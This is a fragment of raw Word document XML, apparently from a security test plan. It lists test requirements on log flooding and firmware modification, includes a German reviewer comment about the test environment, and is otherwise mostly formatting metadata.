      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RQ-009:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C90F026" w14:textId="77777777" w:rsidR="001A1130" w:rsidRPr="006D5B99" w:rsidRDefault="001A1130" w:rsidP="001A1130">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Log Flooding:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F59E9A6" w14:textId="0D63F980" w:rsidR="001A1130" w:rsidRPr="006D5B99" w:rsidRDefault="001A1130" w:rsidP="001A1130">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Configuration Flapping / Audit Exhaustion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17656B49" w14:textId="77777777" w:rsidR="001A1130" w:rsidRPr="006D5B99" w:rsidRDefault="001A1130" w:rsidP="001A1130">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Firmware Modification:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D18B2A" w14:textId="4F674E82" w:rsidR="001A1130" w:rsidRPr="006D5B99" w:rsidRDefault="001A1130" w:rsidP="001A1130">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Verification of the Combined FW/Config Logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D49437" w14:textId="77777777" w:rsidR="001A1130" w:rsidRPr="006D5B99" w:rsidRDefault="001A1130" w:rsidP="001A1130">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B46C02C" w14:textId="77777777" w:rsidR="001A1130" w:rsidRPr="006D5B99" w:rsidRDefault="001A1130" w:rsidP="001A1130">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RQ-013:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244728AF" w14:textId="05B147A9" w:rsidR="001A1130" w:rsidRPr="006D5B99" w:rsidRDefault="001A1130" w:rsidP="001A1130">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Firmware upload flooding / log exhaustion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F08D1A" w14:textId="77777777" w:rsidR="001A1130" w:rsidRPr="006D5B99" w:rsidRDefault="001A1130" w:rsidP="001A1130">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F61FBE2" w14:textId="77777777" w:rsidR="001A1130" w:rsidRPr="006D5B99" w:rsidRDefault="001A1130" w:rsidP="001A1130">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D08D3FD" w14:textId="69BDE7C1" w:rsidR="001A1130" w:rsidRPr="006D5B99" w:rsidRDefault="001A1130" w:rsidP="001A1130">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1596793F" w14:textId="0D8E4E57" w:rsidR="00F25477" w:rsidRPr="006D5B99" w:rsidRDefault="00F25477" w:rsidP="001A1130">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:kern w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00F25477" w:rsidRPr="006D5B99">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lie Nuber" w:date="2026-09-05T21:42:00Z" w:initials="NN">
    <w:p w14:paraId="0571648A" w14:textId="77777777" w:rsidR="007E4E0E" w:rsidRDefault="007E4E0E" w:rsidP="00992902">
      <w:pPr>
        <w:pStyle w:val="Kommentartext"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Kommentarzeichen"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Überprüfen, ob ich das in meiner testumgebung machen kann, wenn ja wie? Und wenn nein, wie müsste ich meine testumbegung erweitern und wie würde ich den test dann durchführen? Tabelle entsprechend ausfüllen</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="1" w:author="Nuber, Nathalie" w:date="2026-09-07T16:12:00Z" w:initials="NN">
    <w:p w14:paraId="06FE7C2D" w14:textId="77777777" w:rsidR="00000645" w:rsidRDefault="00000645" w:rsidP="00000645">
      <w:pPr>
        <w:pStyle w:val="Kommentartext"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Kommentarzeichen"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Take care when performing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71648A" w15:done="0"/>
  <w15:commentEx w15:paraId="06FE7C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9FCC0E" w16cex:dateUtc="2026-09-05T19:42:00Z"/>
  <w16cex:commentExtensible w16cex:durableId="5B61A325" w16cex:dateUtc="2026-09-07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71648A" w16cid:durableId="7D9FCC0E"/>
  <w16cid:commentId w16cid:paraId="06FE7C2D" w16cid:durableId="5B61A3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00576" w14:textId="77777777" w:rsidR="00393903" w:rsidRDefault="00393903" w:rsidP="00106294">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5F6D9854" w14:textId="77777777" w:rsidR="00393903" w:rsidRDefault="00393903"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1750F" w14:textId="77777777" w:rsidR="00393903" w:rsidRDefault="00393903" w:rsidP="00106294">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="738237E4" w14:textId="77777777" w:rsidR="00393903" w:rsidRDefault="00393903"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9787196"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9ED4A8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283121B9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="12D263B8"/>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CCE59B9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="206AF374"/>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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3E09243E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D0A606E0"/>
    <w:lvl w:ilvl="0" w:tplc="2E86447A">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F130FDF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0A605E9C"/>
    <w:lvl w:ilvl="0" w:tplc="9CB08FBE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="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40"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74708C9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4F48DF7A"/>
    <w:lvl w:ilvl="0" w:tplc="2E86447A">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7FB126D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0C5465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1"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5CB6E74"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="547ED746"/>
    <w:lvl w:ilvl="0" w:tplc="0407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Wingdings" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Wingding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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="65E5486E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C1C64A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4"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5"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76"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1800875412">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1861624087">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="195777805">
    <w:abstractNumId w:val="74"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="999620682">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="169295429">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="302007222">
    <w:abstractNumId w:val="59"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="21785199">
    <w:abstractNumId w:val="68"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="978150619">
    <w:abstractNumId w:val="65"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1228612879">
    <w:abstractNumId w:val="55"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="200560063">
    <w:abstractNumId w:val="51"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1567572886">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="136730077">
    <w:abstractNumId w:val="58"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1224409803">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1720666962">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="92210073">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1821463354">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1397162836">
    <w:abstractNumId w:val="75"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="2068722928">
    <w:abstractNumId w:val="45"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1401831179">
    <w:abstractNumId w:val="48"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="310795005">
    <w:abstractNumId w:val="46"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="6058413">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1838232588">
    <w:abstractNumId w:val="66"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="1562593088">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="312292207">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="488516886">
    <w:abstractNumId w:val="63"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="1174606528">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="918908198">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="1556550251">
    <w:abstractNumId w:val="47"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="1866017140">
    <w:abstractNumId w:val="70"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="1224373434">
    <w:abstractNumId w:val="72"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="1080568274">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="119153442">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="1848979185">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="1881546380">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="36" w16cid:durableId="1470169288">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="37" w16cid:durableId="1832985867">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="38" w16cid:durableId="242954892">
    <w:abstractNumId w:val="61"/>
  </w:num>
  <w:num w:numId="39" w16cid:durableId="1270360076">
    <w:abstractNumId w:val="57"/>
  </w:num>
  <w:num w:numId="40" w16cid:durableId="1617758485">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="41" w16cid:durableId="1976330330">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="42" w16cid:durableId="1165976874">
    <w:abstractNumId w:val="60"/>
  </w:num>
  <w:num w:numId="43" w16cid:durableId="1385837320">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="44" w16cid:durableId="1928734123">
    <w:abstractNumId w:val="54"/>
  </w:num>
  <w:num w:numId="45" w16cid:durableId="446702251">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="46" w16cid:durableId="2033221353">
    <w:abstractNumId w:val="44"/>
  </w:num>
  <w:num w:numId="47" w16cid:durableId="1643342070">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="48" w16cid:durableId="701587982">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="49" w16cid:durableId="1058093128">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="50" w16cid:durableId="1747652497">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="51" w16cid:durableId="1185942680">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="52" w16cid:durableId="419985433">
    <w:abstractNumId w:val="56"/>
  </w:num>
  <w:num w:numId="53" w16cid:durableId="1586954349">
    <w:abstractNumId w:val="52"/>
  </w:num>
  <w:num w:numId="54" w16cid:durableId="531649151">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="55" w16cid:durableId="1523281267">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="56" w16cid:durableId="509611549">
    <w:abstractNumId w:val="69"/>
  </w:num>
  <w:num w:numId="57" w16cid:durableId="870990929">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="58" w16cid:durableId="452747168">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="59" w16cid:durableId="1330405529">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="60" w16cid:durableId="777217467">
    <w:abstractNumId w:val="71"/>
  </w:num>
  <w:num w:numId="61" w16cid:durableId="16391778">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="62" w16cid:durableId="1342664768">
    <w:abstractNumId w:val="67"/>
  </w:num>
  <w:num w:numId="63" w16cid:durableId="1139611786">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="64" w16cid:durableId="87164883">
    <w:abstractNumId w:val="53"/>
  </w:num>
  <w:num w:numId="65" w16cid:durableId="76485398">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="66" w16cid:durableId="1544174953">
    <w:abstractNumId w:val="43"/>
  </w:num>
  <w:num w:numId="67" w16cid:durableId="573667544">
    <w:abstractNumId w:val="73"/>
  </w:num>
  <w:num w:numId="68" w16cid:durableId="308245571">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="69" w16cid:durableId="1281645777">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="70" w16cid:durableId="1162816848">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="71" w16cid:durableId="2114589461">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="72" w16cid:durableId="541286859">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="73" w16cid:durableId="2072804402">
    <w:abstractNumId w:val="49"/>
  </w:num>
  <w:num w:numId="74" w16cid:durableId="568273369">
    <w:abstractNumId w:val="62"/>
  </w:num>
  <w:num w:numId="75" w16cid:durableId="1311330711">
    <w:abstractNumId w:val="50"/>
  </w:num>
  <w:num w:numId="76" w16cid:durableId="1653219283">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="77" w16cid:durableId="1670520659">
    <w:abstractNumId w:val="64"/>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lie Nuber">
    <w15:presenceInfo w15:providerId="Windows Live" w15:userId="50d0cb2a5a70756e"/>
  </w15:person>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645"/>
    <w:rsid w:val="00000971"/>
    <w:rsid w:val="0000199A"/>
    <w:rsid w:val="000052A8"/>
    <w:rsid w:val="00005534"/>
    <w:rsid w:val="0000647D"/>
    <w:rsid w:val="00010FF9"/>
    <w:rsid w:val="00012C73"/>
    <w:rsid w:val="000130E2"/>
    <w:rsid w:val="00013154"/>
    <w:rsid w:val="0001329A"/>
    <w:rsid w:val="00013C86"/>
    <w:rsid w:val="000143BB"/>
    <w:rsid w:val="00014EAC"/>
    <w:rsid w:val="000151DD"/>
    <w:rsid w:val="0001571D"/>
    <w:rsid w:val="0002037B"/>
    <w:rsid w:val="00020E38"/>
    <w:rsid w:val="000212BF"/>
    <w:rsid w:val="00021536"/>
    <w:rsid w:val="00021626"/>
    <w:rsid w:val="00021D7C"/>
    <w:rsid w:val="00021ED7"/>
    <w:rsid w:val="0002202F"/>
    <w:rsid w:val="00022C23"/>
    <w:rsid w:val="00023472"/>
    <w:rsid w:val="000234F7"/>
    <w:rsid w:val="000237FE"/>
    <w:rsid w:val="00024009"/>
    <w:rsid w:val="00024076"/>
    <w:rsid w:val="00024160"/>
    <w:rsid w:val="00027D54"/>
    <w:rsid w:val="0003012A"/>
    <w:rsid w:val="00030551"/>
    <w:rsid w:val="0003070F"/>
    <w:rsid w:val="00032E81"/>
    <w:rsid w:val="00033A1D"/>
    <w:rsid w:val="00033CDA"/>
    <w:rsid w:val="00034466"/>
    <w:rsid w:val="000345CC"/>
    <w:rsid w:val="0003511C"/>
    <w:rsid w:val="00035F89"/>
    <w:rsid w:val="000405C0"/>
    <w:rsid w:val="000409F3"/>
    <w:rsid w:val="00040AEE"/>
    <w:rsid w:val="00041E44"/>
    <w:rsid w:val="000427D5"/>
    <w:rsid w:val="00042C26"/>
    <w:rsid w:val="00043484"/>
    <w:rsid w:val="00044679"/>
    <w:rsid w:val="00044FA7"/>
    <w:rsid w:val="00044FB5"/>
    <w:rsid w:val="00045106"/>
    <w:rsid w:val="00045E19"/>
    <w:rsid w:val="00045E59"/>
    <w:rsid w:val="000469E3"/>
    <w:rsid w:val="00047B09"/>
    <w:rsid w:val="00047C55"/>
    <w:rsid w:val="0005196E"/>
    <w:rsid w:val="00051AD4"/>
    <w:rsid w:val="0005233C"/>
    <w:rsid w:val="0005357F"/>
    <w:rsid w:val="0005457F"/>
    <w:rsid w:val="0005526D"/>
    <w:rsid w:val="0005537A"/>
    <w:rsid w:val="000557ED"/>
    <w:rsid w:val="00057FF1"/>
    <w:rsid w:val="00061BB6"/>
    <w:rsid w:val="000620CE"/>
    <w:rsid w:val="000627D6"/>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12D"/>
    <w:rsid w:val="000812E3"/>
    <w:rsid w:val="00081379"/>
    <w:rsid w:val="000819DF"/>
    <w:rsid w:val="0008237D"/>
    <w:rsid w:val="00082D2A"/>
    <w:rsid w:val="00082D8A"/>
    <w:rsid w:val="000835AC"/>
    <w:rsid w:val="000839F0"/>
    <w:rsid w:val="00083BB7"/>
    <w:rsid w:val="00084BCB"/>
    <w:rsid w:val="00085D3A"/>
    <w:rsid w:val="0008672F"/>
    <w:rsid w:val="00086B28"/>
    <w:rsid w:val="000875F9"/>
    <w:rsid w:val="0009084A"/>
    <w:rsid w:val="000915CB"/>
    <w:rsid w:val="00091CEC"/>
    <w:rsid w:val="00091DEE"/>
    <w:rsid w:val="000920B0"/>
    <w:rsid w:val="0009248E"/>
    <w:rsid w:val="00092A2E"/>
    <w:rsid w:val="00092B56"/>
    <w:rsid w:val="0009301C"/>
    <w:rsid w:val="000932DD"/>
    <w:rsid w:val="00093A41"/>
    <w:rsid w:val="00093CC5"/>
    <w:rsid w:val="00094937"/>
    <w:rsid w:val="00094C38"/>
    <w:rsid w:val="00095047"/>
    <w:rsid w:val="000950E6"/>
    <w:rsid w:val="00095EF6"/>
    <w:rsid w:val="00096DED"/>
    <w:rsid w:val="000A2056"/>
    <w:rsid w:val="000A22B5"/>
    <w:rsid w:val="000A2322"/>
    <w:rsid w:val="000A3415"/>
    <w:rsid w:val="000A35E2"/>
    <w:rsid w:val="000A3B23"/>
    <w:rsid w:val="000A57E7"/>
    <w:rsid w:val="000A7340"/>
    <w:rsid w:val="000A753D"/>
    <w:rsid w:val="000B2442"/>
    <w:rsid w:val="000B2EDF"/>
    <w:rsid w:val="000B3D99"/>
    <w:rsid w:val="000B4520"/>
    <w:rsid w:val="000B4D6B"/>
    <w:rsid w:val="000B5E79"/>
    <w:rsid w:val="000B6DC9"/>
    <w:rsid w:val="000B7634"/>
    <w:rsid w:val="000B7BA2"/>
    <w:rsid w:val="000B7D52"/>
    <w:rsid w:val="000B7EAE"/>
    <w:rsid w:val="000C09E4"/>
    <w:rsid w:val="000C20FD"/>
    <w:rsid w:val="000C2EF0"/>
    <w:rsid w:val="000C433F"/>
    <w:rsid w:val="000C45CF"/>
    <w:rsid w:val="000D08FE"/>
    <w:rsid w:val="000D10CA"/>
    <w:rsid w:val="000D1FFC"/>
    <w:rsid w:val="000D25B2"/>
    <w:rsid w:val="000D3183"/>
    <w:rsid w:val="000D370D"/>
    <w:rsid w:val="000D37F2"/>
    <w:rsid w:val="000D4389"/>
    <w:rsid w:val="000D547F"/>
    <w:rsid w:val="000D76A1"/>
    <w:rsid w:val="000E0005"/>
    <w:rsid w:val="000E0178"/>
    <w:rsid w:val="000E0F52"/>
    <w:rsid w:val="000E1482"/>
    <w:rsid w:val="000E2CEE"/>
    <w:rsid w:val="000E32E1"/>
    <w:rsid w:val="000E3E5E"/>
    <w:rsid w:val="000E5D3A"/>
    <w:rsid w:val="000E633A"/>
    <w:rsid w:val="000E6FF9"/>
    <w:rsid w:val="000E700D"/>
    <w:rsid w:val="000E7106"/>
    <w:rsid w:val="000E7BAE"/>
    <w:rsid w:val="000F0962"/>
    <w:rsid w:val="000F1B5F"/>
    <w:rsid w:val="000F1E7E"/>
    <w:rsid w:val="000F3F5C"/>
    <w:rsid w:val="000F43ED"/>
    <w:rsid w:val="000F4496"/>
    <w:rsid w:val="000F45D0"/>
    <w:rsid w:val="000F4A54"/>
    <w:rsid w:val="000F4BA2"/>
    <w:rsid w:val="001018E4"/>
    <w:rsid w:val="001020BE"/>
    <w:rsid w:val="00102657"/>
    <w:rsid w:val="00102DC1"/>
    <w:rsid w:val="00105328"/>
    <w:rsid w:val="00105368"/>
    <w:rsid w:val="00105D20"/>
    <w:rsid w:val="00106270"/>
    <w:rsid w:val="00106294"/>
    <w:rsid w:val="00106BEC"/>
    <w:rsid w:val="001104CF"/>
    <w:rsid w:val="00110639"/>
    <w:rsid w:val="00110A68"/>
    <w:rsid w:val="00111E5F"/>
    <w:rsid w:val="00112C98"/>
    <w:rsid w:val="00112FBC"/>
    <w:rsid w:val="001133A0"/>
    <w:rsid w:val="00113787"/>
    <w:rsid w:val="00113B30"/>
    <w:rsid w:val="001142FB"/>
    <w:rsid w:val="001147A2"/>
    <w:rsid w:val="00114E23"/>
    <w:rsid w:val="0011600D"/>
    <w:rsid w:val="0011719C"/>
    <w:rsid w:val="00117576"/>
    <w:rsid w:val="00117ADD"/>
    <w:rsid w:val="00120CCE"/>
    <w:rsid w:val="00121068"/>
    <w:rsid w:val="001219C7"/>
    <w:rsid w:val="00121C61"/>
    <w:rsid w:val="00121F03"/>
    <w:rsid w:val="00123B2C"/>
    <w:rsid w:val="001255D2"/>
    <w:rsid w:val="00125AC8"/>
    <w:rsid w:val="00125EB4"/>
    <w:rsid w:val="0012676E"/>
    <w:rsid w:val="00126E4E"/>
    <w:rsid w:val="001273D5"/>
    <w:rsid w:val="0013021B"/>
    <w:rsid w:val="00130ECB"/>
    <w:rsid w:val="0013230C"/>
    <w:rsid w:val="00133045"/>
    <w:rsid w:val="00134865"/>
    <w:rsid w:val="0013507A"/>
    <w:rsid w:val="001369AA"/>
    <w:rsid w:val="00136A53"/>
    <w:rsid w:val="00136AF5"/>
    <w:rsid w:val="00136FFD"/>
    <w:rsid w:val="001375D7"/>
    <w:rsid w:val="00137A0B"/>
    <w:rsid w:val="00140969"/>
    <w:rsid w:val="00141F84"/>
    <w:rsid w:val="00142D2D"/>
    <w:rsid w:val="00144991"/>
    <w:rsid w:val="00145377"/>
    <w:rsid w:val="001475E2"/>
    <w:rsid w:val="0015048A"/>
    <w:rsid w:val="00150D40"/>
    <w:rsid w:val="0015145E"/>
    <w:rsid w:val="00152121"/>
    <w:rsid w:val="00153228"/>
    <w:rsid w:val="00154553"/>
    <w:rsid w:val="001545AF"/>
    <w:rsid w:val="00154CD2"/>
    <w:rsid w:val="00154D1E"/>
    <w:rsid w:val="001575F0"/>
    <w:rsid w:val="00157A42"/>
    <w:rsid w:val="001604A0"/>
    <w:rsid w:val="001606CE"/>
    <w:rsid w:val="00160BC6"/>
    <w:rsid w:val="0016109F"/>
    <w:rsid w:val="001611A8"/>
    <w:rsid w:val="001615BF"/>
    <w:rsid w:val="001619C7"/>
    <w:rsid w:val="00161A4E"/>
    <w:rsid w:val="0016260A"/>
    <w:rsid w:val="001628AA"/>
    <w:rsid w:val="00162C5B"/>
    <w:rsid w:val="00163C98"/>
    <w:rsid w:val="001641F1"/>
    <w:rsid w:val="00164CDB"/>
    <w:rsid w:val="00165490"/>
    <w:rsid w:val="00166470"/>
    <w:rsid w:val="00167C8E"/>
    <w:rsid w:val="00171DD3"/>
    <w:rsid w:val="00172182"/>
    <w:rsid w:val="00172643"/>
    <w:rsid w:val="00172F89"/>
    <w:rsid w:val="0017380F"/>
    <w:rsid w:val="001742D7"/>
    <w:rsid w:val="00174A1E"/>
    <w:rsid w:val="00174FCE"/>
    <w:rsid w:val="0017616C"/>
    <w:rsid w:val="00176591"/>
    <w:rsid w:val="0018169B"/>
    <w:rsid w:val="001823B7"/>
    <w:rsid w:val="00184056"/>
    <w:rsid w:val="001855BC"/>
    <w:rsid w:val="00185C64"/>
    <w:rsid w:val="00186C5B"/>
    <w:rsid w:val="001872E8"/>
    <w:rsid w:val="00187412"/>
    <w:rsid w:val="001910BC"/>
    <w:rsid w:val="001919D3"/>
    <w:rsid w:val="00191A69"/>
    <w:rsid w:val="00192240"/>
    <w:rsid w:val="00192CFC"/>
    <w:rsid w:val="0019326C"/>
    <w:rsid w:val="001938D1"/>
    <w:rsid w:val="001938D9"/>
    <w:rsid w:val="00194328"/>
    <w:rsid w:val="00196EB6"/>
    <w:rsid w:val="0019790D"/>
    <w:rsid w:val="001979A9"/>
    <w:rsid w:val="00197B24"/>
    <w:rsid w:val="00197C3B"/>
    <w:rsid w:val="001A0888"/>
    <w:rsid w:val="001A0A4F"/>
    <w:rsid w:val="001A1130"/>
    <w:rsid w:val="001A276A"/>
    <w:rsid w:val="001A2F77"/>
    <w:rsid w:val="001A3C3E"/>
    <w:rsid w:val="001A43AF"/>
    <w:rsid w:val="001A467C"/>
    <w:rsid w:val="001A570E"/>
    <w:rsid w:val="001A6A0B"/>
    <w:rsid w:val="001A6F90"/>
    <w:rsid w:val="001A7F67"/>
    <w:rsid w:val="001B0DED"/>
    <w:rsid w:val="001B1F42"/>
    <w:rsid w:val="001B231D"/>
    <w:rsid w:val="001B3A2D"/>
    <w:rsid w:val="001B3D8F"/>
    <w:rsid w:val="001B4127"/>
    <w:rsid w:val="001B4736"/>
    <w:rsid w:val="001B5366"/>
    <w:rsid w:val="001B7669"/>
    <w:rsid w:val="001B7D54"/>
    <w:rsid w:val="001C0037"/>
    <w:rsid w:val="001C12A7"/>
    <w:rsid w:val="001C2291"/>
    <w:rsid w:val="001C29AC"/>
    <w:rsid w:val="001C696E"/>
    <w:rsid w:val="001C6987"/>
    <w:rsid w:val="001C7310"/>
    <w:rsid w:val="001C76D6"/>
    <w:rsid w:val="001D0F80"/>
    <w:rsid w:val="001D22FB"/>
    <w:rsid w:val="001D2958"/>
    <w:rsid w:val="001D2FC1"/>
    <w:rsid w:val="001D4045"/>
    <w:rsid w:val="001D682D"/>
    <w:rsid w:val="001D74DD"/>
    <w:rsid w:val="001D7D87"/>
    <w:rsid w:val="001E0D21"/>
    <w:rsid w:val="001E1D5E"/>
    <w:rsid w:val="001E44C1"/>
